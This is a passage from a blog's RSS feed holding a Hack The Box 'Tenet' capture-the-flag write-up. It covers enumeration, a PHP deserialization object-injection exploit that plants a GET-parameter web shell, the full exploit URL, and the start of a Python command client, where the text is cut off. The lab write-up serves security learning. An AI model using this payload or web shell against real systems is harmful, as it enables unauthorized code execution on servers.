index.xml

<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>The Wolf Den</title>
    <link>http://0xnightwolf.github.io/</link>
    <description>Recent content on The Wolf Den</description>
    <generator>Hugo -- gohugo.io</generator>
    <language>en-us</language>
    <lastBuildDate>Tue, 22 Jun 2021 00:00:00 +0000</lastBuildDate>
    
        <atom:link href="http://0xnightwolf.github.io/index.xml" rel="self" type="application/rss+xml" />
    
    
    <item>
      <title>HTB Tenet</title>
      <link>http://0xnightwolf.github.io/htb-writeups/tenet-writeup/</link>
      <pubDate>Tue, 22 Jun 2021 00:00:00 +0000</pubDate>
      
      <guid>http://0xnightwolf.github.io/htb-writeups/tenet-writeup/</guid>
      <description>&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/tenet-logo.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;Tenet starts off with a wordpress site. After some enumeration second domain is found and a PHP file vulnerable to object injection. From there, an attacker can get a shell, find credentials in a configuration file, and privesc to root by leveraging a race condition.&lt;/p&gt;
&lt;h2 id=&#34;enumeration&#34;&gt;Enumeration&lt;/h2&gt;
&lt;p&gt;NMAP shows port 22 is open for SSH and port 80 is running an HTTP server displaying the default apache2 page.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Starting Nmap 7.91 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt; https://nmap.org &lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt; at 2021-01-17 00:47 UTC
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Nmap scan report &lt;span style=&#34;color:#66d9ef&#34;&gt;for&lt;/span&gt; 10.10.10.223
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Host is up &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;0.15s latency&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;.
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Not shown: &lt;span style=&#34;color:#ae81ff&#34;&gt;998&lt;/span&gt; closed ports
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;PORT   STATE SERVICE VERSION
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;Ubuntu Linux; protocol 2.0&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;| ssh-hostkey:
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|   &lt;span style=&#34;color:#ae81ff&#34;&gt;2048&lt;/span&gt; cc:ca:43:d4:4c:e7:4e:bf:26:f4:27:ea:b8:75:a8:f8 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;RSA&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|   &lt;span style=&#34;color:#ae81ff&#34;&gt;256&lt;/span&gt; 85:f3:ac:ba:1a:6a:03:59:e2:7e:86:47:e7:3e:3c:00 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;ECDSA&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_  &lt;span style=&#34;color:#ae81ff&#34;&gt;256&lt;/span&gt; e7:e9:9a:dd:c3:4a:2f:7a:e1:e0:5d:a2:b0:ca:44:a8 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;ED25519&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;80/tcp open  http    Apache httpd 2.4.29 &lt;span style=&#34;color:#f92672&#34;&gt;((&lt;/span&gt;Ubuntu&lt;span style=&#34;color:#f92672&#34;&gt;))&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_http-server-header: Apache/2.4.29 &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;Ubuntu&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;|_http-title: Apache2 Ubuntu Default Page: It works
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Nmap &lt;span style=&#34;color:#66d9ef&#34;&gt;done&lt;/span&gt;: &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; IP address &lt;span style=&#34;color:#f92672&#34;&gt;(&lt;/span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; host up&lt;span style=&#34;color:#f92672&#34;&gt;)&lt;/span&gt; scanned in 14.61 seconds
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The default page doesn&amp;rsquo;t give us a whole lot of info and there doesn&amp;rsquo;t seem to be a robots.txt. FFUF or another directory brute forcer  can be used to learn there is a wordpress directory.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;ffuf -u http://10.10.10.223/FUZZ -w /opt/dirbuster-wordlists/directory-list-2.3-medium.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        /&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;___\  /&amp;#39;&lt;/span&gt;___&lt;span style=&#34;color:#ae81ff&#34;&gt;\ &lt;/span&gt;          /&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;&amp;#39;&lt;/span&gt;___&lt;span style=&#34;color:#ae81ff&#34;&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;&lt;/span&gt;       /&lt;span style=&#34;color:#ae81ff&#34;&gt;\ \_&lt;/span&gt;_/ /&lt;span style=&#34;color:#ae81ff&#34;&gt;\ \_&lt;/span&gt;_/  __  __  /&lt;span style=&#34;color:#ae81ff&#34;&gt;\ \_&lt;/span&gt;_/
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;       &lt;span style=&#34;color:#ae81ff&#34;&gt;\ \ &lt;/span&gt;,__&lt;span style=&#34;color:#ae81ff&#34;&gt;\\&lt;/span&gt; &lt;span style=&#34;color:#ae81ff&#34;&gt;\ &lt;/span&gt;,__&lt;span style=&#34;color:#ae81ff&#34;&gt;\/\ \/\ \ \ \ &lt;/span&gt;,__&lt;span style=&#34;color:#ae81ff&#34;&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;&lt;/span&gt;        &lt;span style=&#34;color:#ae81ff&#34;&gt;\ \ \_&lt;/span&gt;/ &lt;span style=&#34;color:#ae81ff&#34;&gt;\ \ \_&lt;/span&gt;/&lt;span style=&#34;color:#ae81ff&#34;&gt;\ \ \_\ \ \ \ \_&lt;/span&gt;/
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;         &lt;span style=&#34;color:#ae81ff&#34;&gt;\ \_\ &lt;/span&gt;  &lt;span style=&#34;color:#ae81ff&#34;&gt;\ \_\ &lt;/span&gt; &lt;span style=&#34;color:#ae81ff&#34;&gt;\ \_&lt;/span&gt;___/  &lt;span style=&#34;color:#ae81ff&#34;&gt;\ \_\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;&lt;/span&gt;          &lt;span style=&#34;color:#ae81ff&#34;&gt;\/&lt;/span&gt;_/    &lt;span style=&#34;color:#ae81ff&#34;&gt;\/&lt;/span&gt;_/   &lt;span style=&#34;color:#ae81ff&#34;&gt;\/&lt;/span&gt;___/    &lt;span style=&#34;color:#ae81ff&#34;&gt;\/&lt;/span&gt;_/
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;       v1.1.0
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;________________________________________________
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; :: Method           : GET
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; :: URL              : http://10.10.10.223/FUZZ
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; :: Wordlist         : FUZZ: /opt/dirbuster-wordlists/directory-list-2.3-medium.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; :: Follow redirects : false
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; :: Calibration      : false
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; :: Timeout          : &lt;span style=&#34;color:#ae81ff&#34;&gt;10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; :: Threads          : &lt;span style=&#34;color:#ae81ff&#34;&gt;40&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; :: Matcher          : Response status: 200,204,301,302,307,401,403
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;________________________________________________
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                        &lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;Status: 200, Size: 10918, Words: 3499, Lines: 376&lt;span style=&#34;color:#f92672&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt;                       &lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;Status: 200, Size: 1688, Words: 186, Lines: 43&lt;span style=&#34;color:#f92672&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;wordpress               &lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;Status: 301, Size: 316, Words: 20, Lines: 10&lt;span style=&#34;color:#f92672&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;                        &lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;Status: 200, Size: 10918, Words: 3499, Lines: 376&lt;span style=&#34;color:#f92672&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;server-status           &lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;Status: 403, Size: 277, Words: 20, Lines: 10&lt;span style=&#34;color:#f92672&#34;&gt;]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;:: Progress: &lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;220547/220547&lt;span style=&#34;color:#f92672&#34;&gt;]&lt;/span&gt; :: Job &lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;1/1&lt;span style=&#34;color:#f92672&#34;&gt;]&lt;/span&gt; :: &lt;span style=&#34;color:#ae81ff&#34;&gt;276&lt;/span&gt; req/sec :: Duration: &lt;span style=&#34;color:#f92672&#34;&gt;[&lt;/span&gt;0:13:17&lt;span style=&#34;color:#f92672&#34;&gt;]&lt;/span&gt; :: Errors: &lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt; ::
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Adding &lt;code&gt;tenet.htb&lt;/code&gt; to  &lt;code&gt;/etc/hosts&lt;/code&gt; will make it function better. Wordpress tends to want to redirect to a domain. There are a few articles talking about their newly coming services and mention of a site migration. On one post, there is a comment that references a &amp;ldquo;sator.php&amp;rdquo; file and a backup version of it. Seemingly, the site migration is incomplete.&lt;/p&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/tenet-migrationcomment.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;Sator dosent&amp;rsquo; exist on this site this site. However,  box might have multiple virtual hosts. That turns out to be the case. After &lt;code&gt;sator.tenet.htb&lt;/code&gt; is added &lt;code&gt;/etc/hosts&lt;/code&gt; a copy of the wordpress site seen found prior is accessible  On this one, &lt;code&gt;sator.php&lt;/code&gt; is present and more importantly, the aforementioned backup version of it, &lt;code&gt;sator.php.bak&lt;/code&gt; is also accessible.&lt;/p&gt;
&lt;h2 id=&#34;foothold&#34;&gt;Foothold&lt;/h2&gt;
&lt;p&gt;&lt;img  src=&#34;http://0xnightwolf.github.io/img/tenet-statorphpbak.png&#34;
        alt/&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;sator.php&lt;/code&gt; takes input through the &lt;code&gt;arepo&lt;/code&gt; parameter. That output is then deserialized. There is also a class that is called DatabaseExport that writes to a file Deseralizaiton can lead to some unintended results through object injection.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;__destruct ()&lt;/code&gt; function means PHP file can be leveraged to create object and from it a file. To  pull this off, write a PHP file that mirrors sator.php but a bit different.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-php&#34; data-lang=&#34;php&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;&amp;lt;?&lt;/span&gt;&lt;span style=&#34;color:#a6e22e&#34;&gt;php&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;class&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;DatabaseExport&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#66d9ef&#34;&gt;public&lt;/span&gt; $user_file &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;users.txt&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#66d9ef&#34;&gt;public&lt;/span&gt; $data &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#66d9ef&#34;&gt;public&lt;/span&gt; &lt;span style=&#34;color:#66d9ef&#34;&gt;function&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;update_db&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    {
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;echo&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;[+] Grabbing users from text file &amp;lt;br&amp;gt;&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        $this&lt;span style=&#34;color:#f92672&#34;&gt;-&amp;gt;&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;data&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;Sucess&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    }
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#66d9ef&#34;&gt;public&lt;/span&gt; &lt;span style=&#34;color:#66d9ef&#34;&gt;function&lt;/span&gt; __construct()
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    {
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        $this&lt;span style=&#34;color:#f92672&#34;&gt;-&amp;gt;&lt;/span&gt;&lt;span style=&#34;color:#a6e22e&#34;&gt;user_file&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;magic.php&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        $this&lt;span style=&#34;color:#f92672&#34;&gt;-&amp;gt;&lt;/span&gt;&lt;span style=&#34;color:#a6e22e&#34;&gt;data&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;&amp;lt;?php system(&amp;#34;whoami&amp;#34;); ?&amp;gt;&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    }
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$app &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#66d9ef&#34;&gt;new&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;DatabaseExport&lt;/span&gt;();
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;echo&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;serialize&lt;/span&gt;($app);
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;echo&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;&lt;/span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;\n&lt;/span&gt;&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#75715e&#34;&gt;?&amp;gt;&lt;/span&gt;&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Instead of a &lt;code&gt;__destruct&lt;/code&gt; a is used &lt;code&gt;__construct&lt;/code&gt; and a few other items are changed as well. The output file is going to be called &lt;code&gt;magic.php&lt;/code&gt; and the contents will be some simple PHP code to execute the &lt;code&gt;whomami&lt;/code&gt; command.&lt;/p&gt;
&lt;p&gt;Running the above file using &lt;code&gt;php file&lt;/code&gt; and outputs the following.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-vim&#34; data-lang=&#34;vim&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#a6e22e&#34;&gt;O&lt;/span&gt;:&lt;span style=&#34;color:#ae81ff&#34;&gt;14&lt;/span&gt;:&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;DatabaseExport&amp;#34;&lt;/span&gt;:&lt;span style=&#34;color:#ae81ff&#34;&gt;2&lt;/span&gt;:{&lt;span style=&#34;color:#a6e22e&#34;&gt;s&lt;/span&gt;:&lt;span style=&#34;color:#ae81ff&#34;&gt;9&lt;/span&gt;:&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;user_file&amp;#34;&lt;/span&gt;;&lt;span style=&#34;color:#a6e22e&#34;&gt;s&lt;/span&gt;:&lt;span style=&#34;color:#ae81ff&#34;&gt;9&lt;/span&gt;:&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;magic.php&amp;#34;&lt;/span&gt;;&lt;span style=&#34;color:#a6e22e&#34;&gt;s&lt;/span&gt;:&lt;span style=&#34;color:#ae81ff&#34;&gt;4&lt;/span&gt;:&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;data&amp;#34;&lt;/span&gt;;&lt;span style=&#34;color:#a6e22e&#34;&gt;s&lt;/span&gt;:&lt;span style=&#34;color:#ae81ff&#34;&gt;26&lt;/span&gt;:&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;&amp;lt;?php system(&amp;#34;&lt;/span&gt;&lt;span style=&#34;color:#a6e22e&#34;&gt;whoami&lt;/span&gt;&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;); ?&amp;gt;&amp;#34;&lt;/span&gt;;}&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This can be sent to the server using the &lt;code&gt;arepo&lt;/code&gt; argument. Then a request can be made to &lt;code&gt;10.10.10.223/magic.php&lt;/code&gt;. The response is &lt;code&gt;www-data&lt;/code&gt;, showing code execution.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;If you are interested in learning more about PHP deserialization attacks, IppSec has some awesome videos I referenced while working on this. &lt;a href=&#34;https://youtu.be/JpzREo7XLOY?t=4174&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;Player 2 PHP deserialization to place an SSH key.&lt;/a&gt;
 and &lt;a href=&#34;https://www.youtube.com/watch?v=HaW15aMzBUM&#34;target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;Intro to PHP deserialization&lt;/a&gt;
&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;This is a bit clumsy though and there are some ways it can be nicened up.&lt;/p&gt;
&lt;p&gt;First  &lt;code&gt;whoami&lt;/code&gt; can be changed to instead take the  argument &lt;code&gt;c&lt;/code&gt; from a get request and execute using the system function.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-php&#34; data-lang=&#34;php&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;&amp;lt;?&lt;/span&gt;&lt;span style=&#34;color:#a6e22e&#34;&gt;php&lt;/span&gt; &lt;span style=&#34;color:#66d9ef&#34;&gt;echo&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;shell_exec&lt;/span&gt;($_GET[&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;c&amp;#39;&lt;/span&gt;]); &lt;span style=&#34;color:#75715e&#34;&gt;?&amp;gt;&lt;/span&gt;&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;That can be created on the Tenet with following.
&lt;code&gt;http://sator.tenet.htb/sator.php?arepo=O:14:&amp;quot;DatabaseExport&amp;quot;:2:{s:9:&amp;quot;user_file&amp;quot;;s:9:&amp;quot;magic.php&amp;quot;;s:4:&amp;quot;data&amp;quot;;s:37:&amp;quot;&amp;lt;?php echo shell_exec($_GET[&amp;quot;c&amp;quot;]); ?&amp;gt;&amp;quot;;}&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;This is very workable and requests can be  sent  with curl, burp, postman, or even just a web browser. But console applications are cool.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-python&#34; data-lang=&#34;python&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;import&lt;/span&gt; requests
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;import&lt;/span&gt; readline
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;URI &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; input(&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;Path to PHP shell. (http://example.site/file.php)&lt;/span&gt;&lt;span style=&#34;color:#ae81ff&#34;&gt;\n&lt;/span&gt;&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;print(&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;Sending commands to: &amp;#34;&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;+&lt;/span&gt; URI)
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
